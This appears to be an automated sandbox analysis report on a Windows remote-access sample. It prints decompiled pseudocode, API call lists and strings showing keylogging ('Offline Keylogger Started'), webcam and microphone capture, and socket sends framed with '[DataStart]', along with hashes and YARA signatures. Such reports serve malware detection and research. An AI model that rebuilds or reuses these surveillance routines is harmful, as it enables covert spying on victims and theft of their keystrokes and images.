                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                  • atoi.MSVCRT ref: 00401D67
                                  • Sleep.KERNEL32 ref: 00401D76
                                    • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                    • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                    • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                  • atoi.MSVCRT ref: 00401DB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                  • API String ID: 3050406488-3547787478
                                  • Opcode ID: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                  • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                  • Opcode Fuzzy Hash: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                  • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405DD3, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 75timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 33%
                                  			E00405DD3(void* __ecx, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char* _t24;
				char* _t25;
				char* _t33;
				int _t34;
				void* _t46;
				void* _t47;

				_t47 = __ecx;
				GetLocalTime( &_v20);
				_t24 =  &_v52;
				L00414176();
				_t25 =  &_v36;
				L00414170();
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t46 = malloc(_t25 + 0x64);
				_t33 = _v20.wYear & 0x0000ffff;
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				_t34 = sprintf(_t46, _t33);
				if( *((char*)(_t47 + 0x3c)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
				}
				if( *((char*)(_t47 + 0x3d)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
					_t20 = _t47 + 0x34; // 0x0
					_t34 = SetEvent( *_t20);
				}
				free(_t46);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t34;
			}












                                  0x00405dde
                                  0x00405de1
                                  0x00405df0
                                  0x00405df9
                                  0x00405e02
                                  0x00405e06
                                  0x00405e12
                                  0x00405e1b
                                  0x00405e24
                                  0x00405e2d
                                  0x00405e3d
                                  0x00405e5c
                                  0x00405e61
                                  0x00405e69
                                  0x00405e76
                                  0x00405e7c
                                  0x00405e7c
                                  0x00405e86
                                  0x00405e8c
                                  0x00405e92
                                  0x00405e95
                                  0x00405e95
                                  0x00405e9c
                                  0x00405ea6
                                  0x00405eaf

                                  APIs
                                  • GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                  • malloc.MSVCRT ref: 00405E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                  • sprintf.MSVCRT ref: 00405E69
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                  • SetEvent.KERNEL32(00000000), ref: 00405E95
                                  • free.MSVCRT(00000000), ref: 00405E9C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                  • API String ID: 2201004561-248792730
                                  • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                  • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402440, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 72networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                  • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                  • send.WS2_32(?,00000000), ref: 004024BB
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                  • send.WS2_32(?,00000000), ref: 004024FF
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                  • String ID: [DataStart]
                                  • API String ID: 1403384299-3852763199
                                  • Opcode ID: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                  • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                  • Opcode Fuzzy Hash: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                  • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040122D, Relevance: 30.1, APIs: 20, Instructions: 118threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                  • closesocket.WS2_32 ref: 00401266
                                  • ExitThread.KERNEL32 ref: 00401274
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,0041B310,00000000), ref: 004012B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                  • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                  • String ID:
                                  • API String ID: 3470141593-0
                                  • Opcode ID: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                  • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                  • Opcode Fuzzy Hash: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                  • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402637, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 94timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00402637(void* __ecx, intOrPtr _a4) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				char _v56;
				char* _t42;
				char* _t43;
				char* _t50;
				char* _t51;
				void* _t68;
				void* _t69;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x38)) == 0) {
					return 0;
				}
				if( *0x41bcac != 0) {
					if( *((char*)(__ecx + 0x44)) != 0) {
						GetLocalTime( &_v24);
						_t50 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t51 =  &_v40;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
						printf(_t51);
						_t69 = _t69 + 0x24;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
					}
					_t16 = _t68 + 0x3c; // 0x0
					if( *_t16 != _a4) {
						GetLocalTime( &_v24);
						_t42 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t43 =  &_v56;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
						printf(_t43);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				}
				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
				return 1;
			}













                                  0x0040263e
                                  0x00402644
                                  0x00000000
                                  0x00402749
                                  0x00402653
                                  0x00402669
                                  0x0040266f
                                  0x0040268b
                                  0x00402699
                                  0x004026a0
                                  0x004026a4
                                  0x004026ae
                                  0x004026b5
                                  0x004026b7
                                  0x004026bd
                                  0x004026c6
                                  0x004026cc
                                  0x004026cc
                                  0x004026d0
                                  0x004026d6
                                  0x004026dc
                                  0x004026f8
                                  0x00402706
                                  0x0040270d
                                  0x00402711
                                  0x0040271b
                                  0x00402722
                                  0x0040272a
                                  0x00402733
                                  0x00402733
                                  0x004026d6
                                  0x0040273c
                                  0x00402740
                                  0x00000000

                                  APIs
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                  • printf.MSVCRT ref: 004026B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                  • printf.MSVCRT ref: 00402722
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                  • API String ID: 1710008465-2297210016
                                  • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                  • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409D3C, Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 102sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(override,00000000), ref: 00409D63
                                    • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                    • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                    • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BA28,?,?,?,00000001), ref: 00409D96
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(pth_unenc,?,?,?,00000001), ref: 00409DB3
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409DC6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(2.7.2 Pro,?), ref: 00409DDC
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(004166F0), ref: 00409DE5
